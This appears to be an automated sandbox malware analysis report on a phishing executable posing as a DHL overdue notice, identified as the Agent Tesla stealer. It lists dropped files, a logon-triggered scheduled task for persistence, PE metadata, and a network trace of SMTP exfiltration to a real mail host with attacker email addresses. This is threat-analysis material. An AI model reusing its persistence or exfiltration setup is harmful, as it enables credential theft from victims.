                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1596
                                                Entropy (8bit):5.097363318585517
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLYkxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT80v
                                                MD5:B6BF1574914D5030ACAF60C0EF3384C8
                                                SHA1:E8AB7FE69CBEB0BCDC9588FC445C8AB16362D01F
                                                SHA-256:CD51388055262B02A5DEAF19EFC4C6894D58911B0579343C9DD6420E185C87F6
                                                SHA-512:73311CA1CD0A4AF0511CB0D1D4767BDC0E300C9BA3AD986867EBF6D02989162B405680AC1BE8CBA47070329E720DBFFB66F651462153DDADB470A0C89FF662E2
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                Process:C:\Users\user\AppData\Roaming\LJAGvecDW.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1596
                                                Entropy (8bit):5.097363318585517
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLYkxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT80v
                                                MD5:B6BF1574914D5030ACAF60C0EF3384C8
                                                SHA1:E8AB7FE69CBEB0BCDC9588FC445C8AB16362D01F
                                                SHA-256:CD51388055262B02A5DEAF19EFC4C6894D58911B0579343C9DD6420E185C87F6
                                                SHA-512:73311CA1CD0A4AF0511CB0D1D4767BDC0E300C9BA3AD986867EBF6D02989162B405680AC1BE8CBA47070329E720DBFFB66F651462153DDADB470A0C89FF662E2
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                Process:C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):881664
                                                Entropy (8bit):7.595213133553131
                                                Encrypted:false
                                                SSDEEP:12288:0YIPXjD9Mo4ALYp92DzclnPtgmDHTtI24666LZwzcu+UEkwE6eeE2:0YIPiEYpQUlPvI251uAuhF5eB
                                                MD5:840CBF490CE0600E1057F72949A37C73
                                                SHA1:151C7C81A8F1E9DD889EEF12E8C4CA6749495DAC
                                                SHA-256:B09A0B160629C46CD40123518CF4BEED875C630F8836E2FEA5D894C43FD58093
                                                SHA-512:922E31024AD6994330A528289D3EC3A9584E78B21BC32D8EE5419BC3793911FC4C092B96DF0C3C55FE562F6FC761E1D60C8AC229E6C23BF8AB64E2D180C3B3F9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 45%
                                                • Antivirus: Virustotal, Detection: 51%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0.................. ........@.. ....................................@.................................N...O.......$...........................l...p............................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc...............r..............@..B........................H............N......+.......`............................................0...........sq...}.....st...}.....st...}.....sX...}.....s....}.....sj...}.....s....}.....sj...}.....sl...}.....sR...}.....s....}.....s....}.....s]...}......}.....(.......()....*....{....(.......{&...(......(......(.....*....0............{.....{....o~.....{.....{....ox.....{.....{....ov.....{.....{....o|.....{.....{....oz.....{.....o......{.....o......{.....o......{.....o......{.....o......{#...r...p.{...
                                                Process:C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:modified
                                                Size (bytes):45984
                                                Entropy (8bit):6.16795797263964
                                                Encrypted:false
                                                SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: TYPE_C_31_M_12 TAMAR 25.4.2024.exe, Detection: malicious, Browse
                                                • Filename: Total Invoice.exe, Detection: malicious, Browse
                                                • Filename: 62402781, Fiyat Teklif Talebi.pdf.exe, Detection: malicious, Browse
                                                • Filename: CREDIT NOTE.exe, Detection: malicious, Browse
                                                • Filename: Total Invoices.exe, Detection: malicious, Browse
                                                • Filename: BARSYL SHIPPING Co (VIETNAM).exe, Detection: malicious, Browse
                                                • Filename: BARSYL SHIPPING Co (VIETNAM).exe, Detection: malicious, Browse
                                                • Filename: Urgent PO 18-3081 Confirmation.exe, Detection: malicious, Browse
                                                • Filename: CAHKHCM2404009CFS.exe, Detection: malicious, Browse
                                                • Filename: FAR.N_2430-240009934.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.469021818116032
                                                Encrypted:false
                                                SSDEEP:6144:ZzZfpi6ceLPx9skLmb0f2ZWSP3aJG8nAgeiJRMMhA2zX4WABluuN5jDH5S:xZHt2ZWOKnMM6bFpLj4
                                                MD5:44B74CE0899F41CCDDB945DCCDC1ED2D
                                                SHA1:155C0D66BC526938E906380856B11B904EA64F48
                                                SHA-256:42C27285A7F9B4ACDAA2AEFBA6FDE6AD0C580AC07F5111211AFE2244C0DC4B16
                                                SHA-512:F916AB7E641EF6BF944736570B2D44447FDC0A6226CD1971A41EB9C84C5A31A0FA50684D5AF2194B252985B5AAC4A88144A12FE394D17DB6195CD2D5F5437A9B
                                                Malicious:false
                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....................................................................................................................................................................................................................................................................................................................................................s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1141
                                                Entropy (8bit):4.442398121585593
                                                Encrypted:false
                                                SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                Malicious:false
                                                Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.595213133553131
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                                                File size:881'664 bytes
                                                MD5:840cbf490ce0600e1057f72949a37c73
                                                SHA1:151c7c81a8f1e9dd889eef12e8c4ca6749495dac
                                                SHA256:b09a0b160629c46cd40123518cf4beed875c630f8836e2fea5d894c43fd58093
                                                SHA512:922e31024ad6994330a528289d3ec3a9584e78b21bc32d8ee5419bc3793911fc4c092b96df0c3c55fe562f6fc761e1d60c8ac229e6c23bf8ab64e2d180c3b3f9
                                                SSDEEP:12288:0YIPXjD9Mo4ALYp92DzclnPtgmDHTtI24666LZwzcu+UEkwE6eeE2:0YIPiEYpQUlPvI251uAuhF5eB
                                                TLSH:141568A037565292D42AB7B71030807422649F5D1F2FD27B3A89FF869DFB2D4CF22616
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0.................. ........@.. ....................................@................................
                                                Icon Hash:176952f8b9512917
                                                Entrypoint:0x4aeca2
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xF3ED4585 [Sun Sep 6 21:28:37 2099 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                xor eax, 35455354h
                                                xor dword ptr [edi+eax*2], esi
                                                dec eax
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ebx+4Ah], dl
                                                push ebx
                                                cmp byte ptr [eax+edi+34h], al
                                                inc ebx
                                                inc ebx
                                                xor al, 37h
                                                xor eax, 00000035h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xaec4e0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x2a124.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xace6c0x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xaccc80xace00e9b130cdb10a44bb341ced349dc2c7b1False0.9524683093817787data7.954566370427042IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xb00000x2a1240x2a20075b09bfd6fda26c50849a2b72aa19a76False0.1300306008902077data3.9579735755049703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xdc0000xc0x2002ed21aa793a76544b4e82c8dca719a0dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xb02b00x2146PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9930734914299131
                                                RT_ICON0xb23f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.04977522772980007
                                                RT_ICON0xc2c200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.07373344544881227
                                                RT_ICON0xcc0c80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.08216266173752311
                                                RT_ICON0xd15500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.09648086915446387
                                                RT_ICON0xd57780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.14885892116182572
                                                RT_ICON0xd7d200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.19160412757973733
                                                RT_ICON0xd8dc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.2807377049180328
                                                RT_ICON0xd97500x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.34397163120567376
                                                RT_GROUP_ICON0xd9bb80x84data0.7045454545454546
                                                RT_VERSION0xd9c3c0x2fcdata0.443717277486911
                                                RT_MANIFEST0xd9f380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                04/26/24-10:06:29.016387TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49721587192.168.2.650.87.253.239
                                                04/26/24-10:06:29.016387TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49721587192.168.2.650.87.253.239
                                                04/26/24-10:06:40.359218TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49731587192.168.2.650.87.253.239
                                                04/26/24-10:06:40.359218TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49731587192.168.2.650.87.253.239
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 26, 2024 10:06:27.259871006 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:27.456449986 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:27.456650972 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:27.712315083 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:27.712992907 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:27.909785986 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:27.913459063 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:28.114681005 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:28.115801096 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:28.334466934 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:28.334762096 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:28.531352043 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:28.534941912 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:28.774986029 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:28.808058023 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:28.808238029 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:29.004662991 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:29.004985094 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:29.016386986 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:29.016467094 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:29.016499996 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:29.018994093 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:29.212958097 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:29.217401981 CEST5874972150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:29.361205101 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:37.628329039 CEST49721587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:38.629363060 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:38.825890064 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:38.826059103 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:39.096323013 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:39.096745014 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:39.293577909 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:39.294231892 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:39.491781950 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:39.492440939 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:39.690692902 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:39.690979958 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:39.887558937 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:39.887757063 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:40.125382900 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:40.161436081 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:40.161607981 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:40.358155012 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:40.358381987 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:40.359217882 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:40.359282017 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:40.359319925 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:40.359334946 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:06:40.555744886 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:40.557014942 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:06:40.781363010 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:08:18.643331051 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:08:18.880176067 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:08:19.041877985 CEST5874973150.87.253.239192.168.2.6
                                                Apr 26, 2024 10:08:19.042030096 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:08:19.042155027 CEST49731587192.168.2.650.87.253.239
                                                Apr 26, 2024 10:08:19.238532066 CEST5874973150.87.253.239192.168.2.6
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 26, 2024 10:06:27.021886110 CEST6265153192.168.2.61.1.1.1
                                                Apr 26, 2024 10:06:27.209973097 CEST53626511.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 26, 2024 10:06:27.021886110 CEST192.168.2.61.1.1.10x6696Standard query (0)mail.clslk.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 26, 2024 10:06:27.209973097 CEST1.1.1.1192.168.2.60x6696No error (0)mail.clslk.com50.87.253.239A (IP address)IN (0x0001)false
                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Apr 26, 2024 10:06:27.712315083 CEST5874972150.87.253.239192.168.2.6220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:06:27 -0600
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Apr 26, 2024 10:06:27.712992907 CEST49721587192.168.2.650.87.253.239EHLO 216554
                                                Apr 26, 2024 10:06:27.909785986 CEST5874972150.87.253.239192.168.2.6250-box2224.bluehost.com Hello 216554 [102.129.152.220]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Apr 26, 2024 10:06:27.913459063 CEST49721587192.168.2.650.87.253.239AUTH login Z21AY2xzbGsuY29t
                                                Apr 26, 2024 10:06:28.114681005 CEST5874972150.87.253.239192.168.2.6334 UGFzc3dvcmQ6
                                                Apr 26, 2024 10:06:28.334466934 CEST5874972150.87.253.239192.168.2.6235 Authentication succeeded
                                                Apr 26, 2024 10:06:28.334762096 CEST49721587192.168.2.650.87.253.239MAIL FROM:<gm@clslk.com>
                                                Apr 26, 2024 10:06:28.531352043 CEST5874972150.87.253.239192.168.2.6250 OK
                                                Apr 26, 2024 10:06:28.534941912 CEST49721587192.168.2.650.87.253.239RCPT TO:<devendra@syncro-group.xyz>
                                                Apr 26, 2024 10:06:28.808058023 CEST5874972150.87.253.239192.168.2.6250 Accepted
                                                Apr 26, 2024 10:06:28.808238029 CEST49721587192.168.2.650.87.253.239DATA
                                                Apr 26, 2024 10:06:29.004985094 CEST5874972150.87.253.239192.168.2.6354 Enter message, ending with "." on a line by itself
                                                Apr 26, 2024 10:06:29.018994093 CEST49721587192.168.2.650.87.253.239.
                                                Apr 26, 2024 10:06:29.217401981 CEST5874972150.87.253.239192.168.2.6250 OK id=1s0GbE-003cJ1-2v
                                                Apr 26, 2024 10:06:39.096323013 CEST5874973150.87.253.239192.168.2.6220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:06:38 -0600
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
